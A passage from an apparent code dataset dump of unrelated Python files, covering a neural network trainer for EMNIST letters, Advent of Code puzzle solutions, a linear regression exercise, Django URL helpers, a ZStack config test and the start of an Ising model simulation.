product\n\n def jsonify(self):\n json = []\n for product in self.products:\n json.append(product.jsonify())\n return json\n\n def get_products_with_category(self, category_id):\n \"\"\"\n\n @rtype : List\n \"\"\"\n try:\n self.categories_mng.get_category_by_id(category_id)\n except ValueError:\n raise AssertionError('Category given does not exists')\n products = []\n for product in self.products:\n for category in product.get_categories():\n if category == category_id:\n products.append(product.jsonify())\n break\n return products\n","sub_path":"back-end/src/ProductsManager.py","file_name":"ProductsManager.py","file_ext":"py","file_size_in_byte":7567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"256147815","text":"# Tom Jarman, 13/03/21\n\nimport numpy as np\nimport numpy.matlib\nimport math\nimport matplotlib.pyplot as plt\nimport csv\nfrom scipy.io import loadmat\n\n\n###########################\n# #\n# Activation Functions #\n# #\n###########################\ndef relu(h):\n \"\"\" ReLU function, takes input h and returns the result of ReLU(h) \"\"\"\n return np.maximum(h, 0)\n\n\n\ndef relu_prime(h):\n \"\"\" Derivative of the ReLU function \"\"\"\n return_value = h.copy() # work on a copy so the caller's array is not mutated in place\n return_value[return_value <= 0] = 0\n return_value[return_value > 0 ] = 1\n return return_value\n\n\n\n###########################\n# #\n# Loading Data #\n# #\n###########################\ndef load_data(filename):\n \"\"\" Loads dataset and performs necessary splitting, shuffling and formatting \"\"\"\n emnist = loadmat(filename)\n\n # Load training images and labels\n train_images_unshuffled = emnist['train_images']\n train_labels_unshuffled = emnist['train_labels']\n\n # Combine labels and training data\n combined_training = np.hstack((train_images_unshuffled, train_labels_unshuffled))\n\n # Shuffle data\n np.random.shuffle(combined_training)\n\n # Separate into data and labels\n # Split into training and validation sets\n train_images = combined_training[:20800,:-1] / 255 # Normalize data, values are now between 0 and 1\n train_labels = combined_training[:20800,-1][...,None] # Turns back into column vector\n validation_images = combined_training[20800:,:-1] / 255 # Normalize data, values are now between 0 and 1\n validation_labels = combined_training[20800:,-1][...,None] # Turns back into column vector\n\n # Load training images and labels\n test_images = emnist['test_images'] / 255 # Normalize data, values are now between 0 and 1\n test_labels = emnist['test_labels']\n\n return train_images, train_labels, test_images, test_labels, validation_images, validation_labels\n\n\n\n###########################\n# #\n# Init Functions #\n# #\n###########################\ndef init_expected_outputs(data, no_labels=26):\n \"\"\" Takes in output labels and converts to corresponding output layer output\"\"\"\n expected_outputs = np.zeros((data.shape[0], no_labels))\n \n for i in range(0,data.shape[0]): \n expected_outputs[i, data[i].astype(int)]=1\n\n return expected_outputs\n\n\n\ndef init_weights(n_input_layer, n_hidden_layer, n_hidden_layer_2, n_output_layer, xavier_init):\n \"\"\" Initialises weights depending on layer sizes and whether Xavier Initialisation is needed\n Reference: Takes inspiration from COM3240 Lab 2 - Matthew Ellis, 15/02/2021\n \"\"\"\n W1, W2, W3 = None, None, None\n \n if xavier_init: # Checks if Xavier initialisation is wanted\n # Initialises weights depending on number of layers present using:\n # Normally distributed random number * square_root(1 / 
number of input neurons to that layer)\n if n_hidden_layer > 0:\n W1 = np.random.randn(n_hidden_layer, n_input_layer) * np.sqrt(1 / (n_input_layer))\n\n if n_hidden_layer_2 > 0:\n W2 = np.random.randn(n_hidden_layer_2, n_hidden_layer) * np.sqrt(1 / (n_hidden_layer))\n W3 = np.random.randn(n_output_layer, n_hidden_layer_2) * np.sqrt(1 / (n_hidden_layer_2))\n\n else:\n W2 = np.random.randn(n_output_layer, n_hidden_layer) * np.sqrt(1 / (n_hidden_layer))\n\n else:\n W1 = np.random.randn(n_output_layer, n_input_layer) * np.sqrt(1 / (n_input_layer))\n\n else:\n # Weights are randomly picked from a uniform distribution between 0 and 1\n # They are normalized by making sure the weights sum to 1\n # Uses different configurations depending on number of layers required\n if n_hidden_layer > 0:\n W1 = np.random.uniform(0,1,(n_hidden_layer, n_input_layer))\n W1 = np.divide(W1,np.matlib.repmat(np.sum(W1,1)[:,None],1,n_input_layer))\n \n if n_hidden_layer_2 > 0:\n W2=np.random.uniform(0,1,(n_hidden_layer_2,n_hidden_layer))\n W2=np.divide(W2,np.matlib.repmat(np.sum(W2,1)[:,None],1,n_hidden_layer))\n\n W3=np.random.uniform(0,1,(n_output_layer,n_hidden_layer_2))\n W3=np.divide(W3,np.matlib.repmat(np.sum(W3,1)[:,None],1,n_hidden_layer_2))\n\n else:\n W2 = np.random.uniform(0,1,(n_output_layer, n_hidden_layer))\n W2 = np.divide(W2,np.matlib.repmat(np.sum(W2,1)[:,None],1,n_hidden_layer))\n\n else:\n W1 = np.random.randn(n_output_layer, n_input_layer) * np.sqrt(1 / (n_input_layer))\n\n return W1, W2, W3\n\n\n\ndef init_bias(n_hidden_layer, n_hidden_layer_2, n_output_layer):\n \"\"\" Initialises the bias weights (thresholds) for each neuron in each layer\"\"\"\n bias_W1, bias_W2, bias_W3 = None, None, None\n\n # Create empty arrays of the desired size given by the number of neurons per layer\n # Arrays are populated with 0's\n if n_hidden_layer > 0:\n bias_W1 = np.zeros((n_hidden_layer,1))\n\n if n_hidden_layer_2 > 0:\n bias_W2=np.zeros((n_hidden_layer_2,1)) \n bias_W3=np.zeros((n_output_layer,1))\n\n else:\n bias_W2 = np.zeros((n_output_layer,1))\n\n else:\n bias_W1 = np.zeros((n_output_layer,1))\n\n return bias_W1, bias_W2, bias_W3\n\n\n\n###########################\n# #\n# Training Metrics #\n# #\n###########################\ndef calculate_average_weight(tau, average_weight, average_weight_plot, prev_w1, w1, epoch):\n \"\"\" Calculates average change \"\"\"\n if epoch == 0:\n average_weight = w1 - prev_w1 # When Epoch = 0 using delta_w\n\n else:\n delta_w1 = w1 - prev_w1\n average_weight = (average_weight * (1 - tau)) + (tau * delta_w1)\n \n average_weight_plot[epoch] = np.sum(average_weight)\n print(\"Average weight: {}\".format(np.sum(average_weight)))\n return average_weight_plot, average_weight\n\n \n\ndef plot_results(data, xlabel, ylabel, title, legend):\n plt.plot(data, label=legend)\n plt.legend(loc=\"upper left\")\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.title(title)\n plt.show()\n\n\n\n###########################\n# #\n# Training Model #\n# #\n###########################\ndef train(epoch, w1, w2, w3, samples, n_batches, bias_w1, bias_w2, bias_w3, n_hidden_layer, n_hidden_layer_2, \n batch_size, train_data, train_output, valid_data, valid_output, learning_rate, lmbda, l1):\n \"\"\" \n Trains the model based on the system parameters\n Uses the ReLU function and derivative to train neuron weights\n Weights are trained depending on the number of layers\n Batch training is carried out with weights being updated at the end of each bach\n After each epoch accuracy, error and average weight update 
(for single layer) are calculated\n At the end of training graphs are output for error, accuracy and average weight (single layer) per epoch\n \"\"\"\n # Initialise empty error and accuracy arrays\n errors = np.zeros((epoch,))\n accuracies = np.zeros((epoch,))\n\n # If it is only a single layer network initialise variables for calcualting average weight\n if (n_hidden_layer == 0) and (n_hidden_layer_2 == 0):\n tau = 0.01\n average_weight = np.zeros(w1.shape)\n average_weight_plot = np.zeros((epoch,1))\n prev_w1 = np.copy(w1)\n\n # Epoch loop\n for i in range(epoch):\n # Build an array of shuffled indexes\n shuffled_indexes = np.random.permutation(samples)\n\n # Batch loop\n for batch in range(0, n_batches):\n \n # Initialise empty change in weight and bias depending on number of layers\n delta_w1 = np.zeros(w1.shape)\n delta_bias_w1 = np.zeros(bias_w1.shape)\n if n_hidden_layer > 0:\n delta_w2 = np.zeros(w2.shape)\n delta_bias_w2 = np.zeros(bias_w2.shape)\n if n_hidden_layer_2 > 0:\n delta_w3 = np.zeros(w3.shape)\n delta_bias_w3 = np.zeros(bias_w3.shape)\n\n # Extract indexes, and corresponding data from the input and expected output\n indexes = shuffled_indexes[batch*batch_size : (batch+1)*batch_size]\n x0 = train_data[indexes].T\n t = train_output[indexes].T\n\n # Apply input weights to summation of inputs and add bias terms\n h1 = np.matmul(w1, x0) + bias_w1\n # Apply the activation function to the summation\n x1 = relu(h1)\n \n # For first hidden layer\n if n_hidden_layer > 0:\n # Apply input weights to summation of inputs and add bias terms\n h2 = np.matmul(w2, x1) + bias_w2\n # Apply the activation function to the summation\n x2 = relu(h2)\n\n # For second hidden layer\n if n_hidden_layer_2 > 0:\n # Apply input weights to summation of inputs and add bias terms\n h3 = np.matmul(w3, x2) + bias_w3\n # Apply the activation function to the summation\n x3 = relu(h3)\n\n # Error signal\n error = t - x3\n # Local gradient for second hidden layer\n delta_3 = relu_prime(x3) * error\n # Change in weight at second hidden layer\n delta_w3 = (learning_rate / batch_size) * np.matmul(delta_3, x2.T)\n # Change in bias at second hidden layer\n delta_bias_w3 = (learning_rate / batch_size) * np.sum(delta_3, axis=1)\n # Reshape to be a matrix rather than column vector\n delta_bias_w3 = delta_bias_w3.reshape(-1, 1)\n\n # Local gradient for first hidden layer\n delta_2 = relu_prime(h2) * np.matmul(w3.T, delta_3)\n # Change in weight at first hidden layer\n delta_w2 = (learning_rate / batch_size) * np.matmul(delta_2, x1.T)\n # Change in bias at first hidden layer\n delta_bias_w2 = (learning_rate / batch_size) * np.sum(delta_2, axis=1)\n # Reshape to be a matrix rather than column vector\n delta_bias_w2 = delta_bias_w2.reshape(-1, 1)\n\n\n # Local gradient for input layer\n delta_1 = relu_prime(h1) * np.matmul(w2.T, delta_2)\n # Change in weight at input layer\n delta_w1 = (learning_rate / batch_size) * np.matmul(delta_1, x0.T)\n # Change in bias at input layer\n delta_bias_w1 = (learning_rate / batch_size) * np.sum(delta_1, axis=1)\n # Reshape to be a matrix rather than column vector \n delta_bias_w1 = delta_bias_w1.reshape(-1, 1)\n\n\n else:\n # Error signal\n error = t - x2\n # Change in weight at first hidden layer\n delta_2 = relu_prime(x2) * error\n # Change in weight at first hidden layer\n delta_w2 = (learning_rate / batch_size) * np.matmul(delta_2, x1.T)\n # Change in bias at first hidden layer\n delta_bias_w2 = (learning_rate / batch_size) * np.sum(delta_2, axis=1)\n # Reshape to be a matrix rather 
than column vector\n delta_bias_w2 = delta_bias_w2.reshape(-1, 1)\n\n # Local gradient for input layer\n delta_1 = relu_prime(h1) * np.matmul(w2.T, delta_2)\n # Change in weight at input layer\n delta_w1 = (learning_rate / batch_size) * np.matmul(delta_1, x0.T)\n # Change in bias at input layer\n delta_bias_w1 = (learning_rate / batch_size) * np.sum(delta_1, axis=1)\n # Reshape to be a matrix rather than column vector \n delta_bias_w1 = delta_bias_w1.reshape(-1, 1)\n\n else:\n # Error signal\n error = t - x1\n # Local gradient for input layer\n delta_1 = relu_prime(x1) * error\n # Change in weight at input layer\n delta_w1 = (learning_rate / batch_size) * np.matmul(delta_1, x0.T)\n # Change in bias at input layer\n delta_bias_w1 = (learning_rate / batch_size) * np.sum(delta_1, axis=1)\n # Reshape to be a matrix rather than column vector \n delta_bias_w1 = delta_bias_w1.reshape(-1, 1)\n\n # Checks if L1 error is used as well\n if l1:\n # Takes away the derivative of L1 from the change in weight\n delta_w1 -= (learning_rate / batch_size) * lmbda * np.sign(w1)\n # Takes away the derivative of L1 from the change in bias\n delta_bias_w1 -= (learning_rate / batch_size) * lmbda * np.sign(bias_w1)\n\n # Checks if hidden layer present\n if n_hidden_layer > 0:\n # Takes away the derivative of L1 from the change in weight\n delta_w2 -= (learning_rate / batch_size) * lmbda * np.sign(w2)\n # Takes away the derivative of L1 from the change in bias\n delta_bias_w2 -= (learning_rate / batch_size) * lmbda * np.sign(bias_w2)\n \n # Checks if second hidden layer present\n if n_hidden_layer_2 > 0:\n # Takes away the derivative of L1 from the change in weight\n delta_w3 -= (learning_rate / batch_size) * lmbda * np.sign(w3)\n # Takes away the derivative of L1 from the change in bias\n delta_bias_w3 -= (learning_rate / batch_size) * lmbda * np.sign(bias_w3)\n\n\n # Add change in weight\n w1 += delta_w1\n # Add change in bias\n bias_w1 += delta_bias_w1\n\n # Checks if hidden layer present\n if n_hidden_layer > 0:\n # Add change in weight\n w2 += delta_w2\n # Add change in bias\n bias_w2 += delta_bias_w2\n \n # Checks if second hidden layer present\n if n_hidden_layer_2 > 0:\n # Add change in weight\n w3 += delta_w3\n # Add change in bias\n bias_w3 += delta_bias_w3\n\n # Calculate and print average weight (single layer), accuracy and error at the end of the epoch\n print(\"------ Epoch {} ------\".format(i+1))\n if n_hidden_layer == 0:\n # If single layer present calculate average weight change\n average_weight_plot, average_weight = calculate_average_weight(tau, average_weight, average_weight_plot,\n prev_w1, w1, i)\n prev_w1 = np.copy(w1)\n # Calculate accuracy and error based on validation data\n accuracies[i], errors[i] = test(valid_data, valid_output, n_hidden_layer, n_hidden_layer_2, w1, w2, w3, \n bias_w1, bias_w2, bias_w3, l1, lmbda)\n print(\"---------------------\")\n print(\"\\n\")\n \n # Plot results for error, accruacy and average weight (single layer)\n #if n_hidden_layer == 0:\n # plot_results(average_weight_plot, 'Epoch', 'Average Weight Update Sum',\n # 'Average Weight Update Sum per Epoch', 'Average Weight Update Sum')\n #plot_results(errors, 'Epoch', 'Error', 'Error on Validation Set per Epoch', 'Error')\n #plot_results(accuracies, 'Epoch', 'Accuracy', 'Accuracy on Validation Set per Epoch', 'Accuracy')\n return w1, w2, w3, bias_w1, bias_w2, bias_w3\n\n\n\ndef test(test_data, test_output, n_hidden_layer, n_hidden_layer_2, w1, w2, w3, bias_w1, bias_w2, bias_w3, l1, lmbda):\n \"\"\" \n Predicts 
outputs depending on input data, trained weights and biases\n \"\"\"\n # Set up initial variables\n samples = test_data.shape[0]\n correct_values = np.argmax(test_output, axis=1)\n predicted_values = np.zeros((samples,))\n error = np.zeros(test_output.shape)\n error_l1 = 0\n\n # Extract inputs\n x0 = test_data.T\n\n # Apply input weights to summation of inputs and add bias terms\n h1 = np.matmul(w1, x0) + bias_w1\n # Apply the activation function to the summation\n x1 = relu(h1)\n\n # Checks if L1 is wanted\n if l1:\n # Calculates l1 error for input layer\n error_l1 = lmbda * np.sum(np.sqrt(np.square(w1)))\n\n # Checks if hidden layer is needed\n if n_hidden_layer > 0:\n # Apply input weights to summation of inputs and add bias terms\n h2 = np.matmul(w2, x1) + bias_w2\n # Apply the activation function to the summation\n x2 = relu(h2)\n if l1:\n # Calculates l1 error for hidden layer\n error_l1 += lmbda * np.sum(np.sqrt(np.square(w2)))\n\n if n_hidden_layer_2 > 0:\n # Apply input weights to summation of inputs and add bias terms\n h3 = np.matmul(w3, x2) + bias_w3\n # Apply the activation function to the summation\n x3 = relu(h3)\n if l1:\n # Calculates l1 error for second hidden layer\n error_l1 += lmbda * np.sum(np.sqrt(np.square(w3)))\n\n # Calculate labels\n predicted_values = np.argmax(x3, axis=0)\n # Error Signal\n error = (test_output - x3.T)\n\n else:\n # Calculate labels\n predicted_values = np.argmax(x2, axis=0)\n # Error Signal\n error = (test_output - x2.T)\n\n else:\n # Calculate labels\n predicted_values = np.argmax(x1, axis=0)\n # Error Signal\n error = (test_output - x1.T)\n\n # Calculate MSE error\n error_mse = np.sum(np.square(error)) / (2 * error.shape[0])\n\n # Add MSE error to L1 error, if L1 isn't used this will add 0\n error = error_mse + error_l1\n\n # Calculate accuracy of predictions\n accuracy = (np.sum(predicted_values == correct_values) / samples) * 100\n\n print(\"Accuracy = \", accuracy)\n print(\"Error = \", error)\n return accuracy, error\n\n\n\ndef main():\n # Load the EMNIST dataset\n train_images, train_labels, test_images, test_labels, validation_images, validation_labels = load_data('emnist-letters-1k.mat')\n\n # Systems Variables\n NO_LABELS = 26\n EPOCH = 250\n LAMBDA = 0.00001 \n BATCH_SIZE = 50\n SAMPLES = train_images.shape[0]\n IMAGE_SIZE = train_images.shape[1]\n N_BATCHES = int(math.ceil(SAMPLES / BATCH_SIZE))\n LEARNING_RATE = 0.05\n XAVIER_INIT = True # Boolean, determines if XAVIER_INIT is used\n L1_ERROR = True # Boolean, determines if L1 Error is used\n\n # Number of neurons in each layer\n # For the hidden layers 0 means the layer doesn't exist\n N_INPUT_LAYER = IMAGE_SIZE\n N_HIDDEN_LAYER = 100\n N_HIDDEN_LAYER_2 = 20\n N_OUTPUT_LAYER = NO_LABELS\n\n # Turns labels into expected output of output layer\n test_output = init_expected_outputs(test_labels)\n train_output = init_expected_outputs(train_labels)\n validation_output = init_expected_outputs(validation_labels)\n\n # Initialises weights before training\n w1, w2, w3 = init_weights(N_INPUT_LAYER, N_HIDDEN_LAYER, N_HIDDEN_LAYER_2, N_OUTPUT_LAYER, XAVIER_INIT)\n # Initialises Bias terms\n bias_w1, bias_w2, bias_w3 = init_bias(N_HIDDEN_LAYER, N_HIDDEN_LAYER_2, N_OUTPUT_LAYER)\n\n # Trains model and returns weights and bias terms\n w1, w2, w3, bias_w1, bias_w2, bias_w3 = train(EPOCH, w1, w2, w3, SAMPLES, N_BATCHES, bias_w1, bias_w2, bias_w3,\n N_HIDDEN_LAYER, N_HIDDEN_LAYER_2, BATCH_SIZE, train_images, \n train_output, validation_images, validation_output, LEARNING_RATE,\n LAMBDA, 
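# added note: L1_ERROR (bool) switches the L1 weight-decay branches in train() and test() on; LAMBDA scales those penalty terms\n 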
L1_ERROR)\n\n # Tests data based on system parameters and trained model, prints accuracy and error\n print(\"------ Test Data ------\")\n test(test_images, test_output, N_HIDDEN_LAYER, N_HIDDEN_LAYER_2, w1, w2, w3, bias_w1, \n bias_w2, bias_w3, L1_ERROR, LAMBDA)\n print(\"-----------------------\")\n print(\"\\n\")\n\nif __name__ == \"__main__\":\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"612380368","text":"from pickle import load\nfrom sys import argv\nfrom time import sleep\n\nimport Processor\nimport snake\n\nif len(argv) != 2:\n print(\"Please give me a program to run\")\n exit(1)\n\nfile = open(argv[1], 'rb')\nprogram, register_count, input_count, instruction_set = load(file)\n\nProcessor_Class = {'simple': Processor.SimpleProcessor, 'complex': Processor.Processor}[instruction_set]\n\nprogram_runner = Processor_Class(register_count=register_count,\n input_count=input_count,\n output_count=4)\nprogram_runner.set_program(program)\n\nprogram_runner.print_program()\n\nwhile True:\n score = snake.run(True, program_runner)\n print(\"Score: {}\".format(score))\n sleep(1)","sub_path":"Genetic/runProgram.py","file_name":"runProgram.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"325530935","text":"\ndef parche(doc):\n\tparche=doc[\"version\"]\n\treturn parche\ndef disponibles(doc):\n\tnum=len(doc[\"data\"])\n\treturn num\ndef campeones(doc):\n\tlistacampeones=[]\n\tfor elem in doc[\"data\"]:\n\t\tlistacampeones.append(elem)\n\treturn listacampeones\n\ndef descripciones(campeon,doc):\n\tfor elem in doc[\"data\"]:\n\t\tif elem == campeon:\n\t\t\tdescripcion=doc[\"data\"][campeon][\"blurb\"]\n\treturn descripcion\n\ndef stats(campeon,doc):\n\tfor elem in doc[\"data\"]:\n\t\tif elem == campeon:\n\t\t\testadisticas=doc[\"data\"][campeon][\"stats\"]\n\treturn estadisticas\n\t\ndef busqueda(buscar,doc):\n\tlistacampeones=[]\n\tfor elem in doc[\"data\"]:\n\t\tif elem.startswith(buscar):\n\t\t\tlistacampeones.append(elem)\n\treturn listacampeones\n\ndef roles(rol,doc):\n\tlistacampeones=[]\n\tfor elem in doc[\"data\"].values():\n\t\tif rol in elem[\"tags\"]:\n\t\t\tcampeon={}\n\t\t\tcampeon[\"nombre\"]=elem[\"name\"]\n\t\t\tcampeon[\"titulo\"]=elem[\"title\"]\n\t\t\tlistacampeones.append(campeon)\n\treturn listacampeones","sub_path":"funciones.py","file_name":"funciones.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"131783622","text":"track = []\nfor line in open(\"Day13Input.txt\"):\n if line: # Create a 2D list with rows and columns\n track.append([char for char in line])\n\n# Up: item 0 Right: item 1 Down: item 2 Left: item 3\ndirectionsRow = [-1, 0, 1, 0]\ndirectionsColumn = [0, 1, 0, -1]\n\n\ndef turnleft(direction):\n return (direction + 3) % 4\n\n\ndef turnright(direction):\n return(direction + 1) % 4\n\n\nclass Cart(object):\n def __init__(self, row, column, direction, intersection):\n self.row = row # Cart's row (y value)\n self.column = column # Cart's column (x value)\n self.direction = direction\n self.intersection = intersection\n\n\n# Identify and add carts\ncarts = []\nfor r in range(len(track)): # For every row in the track\n for c in range(len(track[r])): # For every column in the track\n if track[r][c] == '^': # If there is a cart 
going upwards\n track[r][c] = '|' # Replace it with a vertical track\n carts.append(Cart(r, c, 0, 0)) # Add it to the carts list\n elif track[r][c] == '>': # If there is a cart going right\n track[r][c] = '-' # Replace it with a horizontal track\n carts.append(Cart(r, c, 1, 0)) # Add it to the carts list\n elif track[r][c] == 'v': # If there is a cart going downwards\n track[r][c] = '|' # Replace it with a vertical track\n carts.append(Cart(r, c, 2, 0)) # Add it to the carts list\n elif track[r][c] == '<': # If there is a cart going left\n track[r][c] = '-' # Replace it with a horizontal track\n carts.append(Cart(r, c, 3, 0)) # Add it to the carts list\n\nwhile len(carts) > 1: # While there are more than one cart left\n # Resort the carts (using lambda to sort by row THEN column)\n carts = sorted(carts, key=lambda cart: (cart.row, cart.column))\n for cart in carts: # Loop through all carts\n newRow = cart.row + directionsRow[cart.direction] # Work out next row move for cart\n newColumn = cart.column + directionsColumn[cart.direction] # Work out next column move for cart\n if track[newRow][newColumn] == '\\\\': # If the next move is on a left turn ('\\\\' used to ignore escape chars)\n # If the cart is going up into turn, turn left\n # If it is going right into this turn, turn downwards\n # If it is going down into this turn, turn right\n # If it is going left into this turn, turn upwards\n cart.direction = {0: 3, 1: 2, 2: 1, 3: 0}[cart.direction]\n elif track[newRow][newColumn] == '/': # If the next move is on a right turn\n cart.direction = {0: 1, 1: 0, 2: 3, 3: 2}[cart.direction] # Change direction accordingly\n elif track[newRow][newColumn] == '+': # If the next move is on an intersection\n if cart.intersection == 0: # And if the cart is on its 1st out of 3 intersections\n cart.direction = turnleft(cart.direction) # Turn the cart left\n elif cart.intersection == 1: # If the cart is on its 2nd out of 3 intersections\n pass # Do nothing\n elif cart.intersection == 2: # If the cart is on its 3rd out of 3 intersections\n cart.direction = turnright(cart.direction) # Turn the cart right\n cart.intersection = (cart.intersection + 1) % 3 # Ensure the intersections always stays out of 3\n if (newRow, newColumn) in [(other.row, other.column) for other in carts]: # If another cart is already there\n carts = [other for other in carts if (other.row, other.column) not in\n [(cart.row, cart.column), (newRow, newColumn)]] # Remove both carts from carts list\n print(newColumn, newRow) # Print where the collision happened\n # Finally, end the tick and set the cart's row + column to their new values\n cart.row = newRow\n cart.column = newColumn\n\nprint(\"Final cart: \" + str(carts[0].column) + \", \" + str(carts[0].row)) # Print last remaining cart","sub_path":"AdventOfCode2018/Day13/Day13Part2.py","file_name":"Day13Part2.py","file_ext":"py","file_size_in_byte":4001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"644965327","text":"# Libraries\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport pandas as pd\n\n# Import the dataset\ndataset = pd.read_csv('./ejercicios/regresion-lineal/Salary_Data.csv')\nx = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, -1].values\n\n# Split into training and test sets\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=0)\n\n# Create the linear regression model\nfrom sklearn.linear_model import 
LinearRegression\nregresion = LinearRegression()\nregresion.fit(x_train, y_train)\n\n# Predict on the test set\ny_predic = regresion.predict(x_test)\n\n# Plot the results\nplt.scatter(x_test, y_test, color=\"red\")\nplt.plot(x_test, y_predic, color=\"blue\")\nplt.title(\"Sueldo vs Años de experiencia\")\nplt.xlabel(\"Años de experiencia\")\nplt.ylabel(\"Sueldo $\")\nplt.show()\n","sub_path":"ejercicios/regresion-lineal/plantilla.py","file_name":"plantilla.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"580622837","text":"\n\ndef get_instructions(instructions):\n for char in instructions:\n yield char\n\ndef process_instruction(loc, instruction):\n x,y = loc\n if instruction == '>':\n x += 1\n elif instruction == '<':\n x -= 1\n elif instruction == '^':\n y += 1\n elif instruction == 'v':\n y -= 1\n return x,y\n\nwith open('inputs/day3.txt','r') as fid:\n data = fid.read().splitlines()[0]\n\ndelivered_houses = {}\nloc = (0,0)\nfor instruction in get_instructions(data):\n loc = process_instruction(loc, instruction)\n delivered_houses[loc] = delivered_houses.get(loc,0) + 1\nnum_houses = len(delivered_houses)\nprint(f\"Part 1: Number of houses with >= 1 present = {num_houses}\")\n\n\n\ndelivered_houses = {}\nsanta_loc = (0,0)\nrobo_santa_loc = (0,0)\ninstr_gen = get_instructions(data)\nwhile True:\n try:\n santa_loc = process_instruction(santa_loc, next(instr_gen))\n delivered_houses[santa_loc] = delivered_houses.get(santa_loc,0) + 1\n except StopIteration:\n break\n try:\n robo_santa_loc = process_instruction(robo_santa_loc, next(instr_gen))\n delivered_houses[robo_santa_loc] = delivered_houses.get(robo_santa_loc,0) + 1\n except StopIteration:\n break\n\nnum_houses = len(delivered_houses)\nprint(f\"Part 2: Number of houses with >= 1 present = {num_houses}\")\n","sub_path":"2015/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}
+{"seq_id":"440846803","text":"from django.utils.module_loading import import_string\r\nfrom django.urls.resolvers import URLResolver, URLPattern\r\nfrom django.conf import settings\r\nimport re\r\ndef recursion_urls( pre_url, urlpatterns, url_list):\r\n \"\"\"\r\n Recursively collect URLs\r\n :param per_namespace: namespace prefix, used later to build the name\r\n :param per_url: url prefix, used later to join urls\r\n :param urlpatterns: list of route mappings\r\n :param url_ordered_dict: holds all routes collected during the recursion\r\n :return:\r\n \"\"\"\r\n for item in urlpatterns:\r\n if re.match('admin/', str(item.pattern)):\r\n continue\r\n if isinstance(item, URLPattern): # a plain route, not an included urlconf\r\n url = pre_url + str(item.pattern).replace('^', '',1)\r\n url_list.append(url)\r\n elif isinstance(item, URLResolver):\r\n recursion_urls( pre_url + str(item.pattern), item.url_patterns, url_list)\r\n\r\ndef get_all_url_list():\r\n \"\"\"\r\n Collect all URLs in the project\r\n :return:\r\n \"\"\"\r\n url_list = []\r\n md = import_string(settings.ROOT_URLCONF)\r\n recursion_urls('/', md.urlpatterns, url_list) # recursively collect all routes\r\n return url_list\r\n\r\ndef check_current_url(current_url):\r\n all_url = get_all_url_list()\r\n for url in all_url:\r\n\r\n if re.match(url, current_url):\r\n print(url, current_url)\r\n return url\r\n\r\n return False","sub_path":"apps/rbac/middleware/get_url.py","file_name":"get_url.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}
+{"seq_id":"456545967","text":"import os\nchoice = 0\nfilename = ''\n\ndef menu():\n global choice\n print ('Menu\\n 1.open Calculator\\n 2.Open Notepad\\n 3.Exit')\n choice = input('Select Menu : ')\n\ndef opennotepad():\n filename = 'C:Windows\\System32\\\\notepad.exe'\n print('Memorandum writing %s'%filename)\n os.system(filename)\n\nwhile True:\n menu()\n if choice == '1':\n opennotepad()\n break \n","sub_path":"another/test7.py","file_name":"test7.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"172675377","text":"'''\ncheck the global_config category is networkService\n@author YeTian 2018-09-20\n'''\n\nimport zstackwoodpecker.test_util as test_util\nimport test_stub\nimport zstackwoodpecker.test_lib as test_lib\nimport zstackwoodpecker.operations.config_operations as conf_ops\n\ndef test():\n\n global deft_networkService_1\n global deft_networkService_2\n global deft_networkService_3\n global deft_networkService_4\n #get the default value\n deft_networkService_1 = conf_ops.get_global_config_default_value('networkService', 'defaultDhcpMtu.l2VlanNetwork')\n deft_networkService_2 = conf_ops.get_global_config_default_value('networkService', 'defaultDhcpMtu.dummyNetwork')\n deft_networkService_3 = conf_ops.get_global_config_default_value('networkService', 'defaultDhcpMtu.l2VxlanNetwork')\n deft_networkService_4 = conf_ops.get_global_config_default_value('networkService', 'defaultDhcpMtu.l2NoVlanNetwork')\n\n\n # change the default value\n\n conf_ops.change_global_config('networkService', 'defaultDhcpMtu.l2VlanNetwork', '1000')\n conf_ops.change_global_config('networkService', 'defaultDhcpMtu.dummyNetwork', '1000')\n conf_ops.change_global_config('networkService', 'defaultDhcpMtu.l2VxlanNetwork', '1000')\n conf_ops.change_global_config('networkService', 'defaultDhcpMtu.l2NoVlanNetwork', '1000')\n\n\n # restore defaults\n\n conf_ops.change_global_config('networkService', 'defaultDhcpMtu.l2VlanNetwork', '%s' % deft_networkService_1)\n conf_ops.change_global_config('networkService', 'defaultDhcpMtu.dummyNetwork', '%s' % deft_networkService_2)\n conf_ops.change_global_config('networkService', 'defaultDhcpMtu.l2VxlanNetwork', '%s' % deft_networkService_3)\n conf_ops.change_global_config('networkService', 'defaultDhcpMtu.l2NoVlanNetwork', '%s' % deft_networkService_4)\n\n\n#Will be called only if exception happens in test().\ndef error_cleanup():\n global deft_networkService_1\n\n","sub_path":"integrationtest/vm/simulator/config/test_config_category_networkservice.py","file_name":"test_config_category_networkservice.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"91863438","text":"import random\nimport numpy as np\nfrom scipy import signal\nfrom annealing import B_anneal, T_anneal\n\ntry:\n __IPYTHON__\nexcept:\n from tqdm import tqdm\n\ndef run_ising(N,T,num_steps,num_burnin,flip_prop,J,B,disable_tqdm=False):\n\n # Description of parameters:\n # N = Grid Size\n # T = Temperature (normalized to 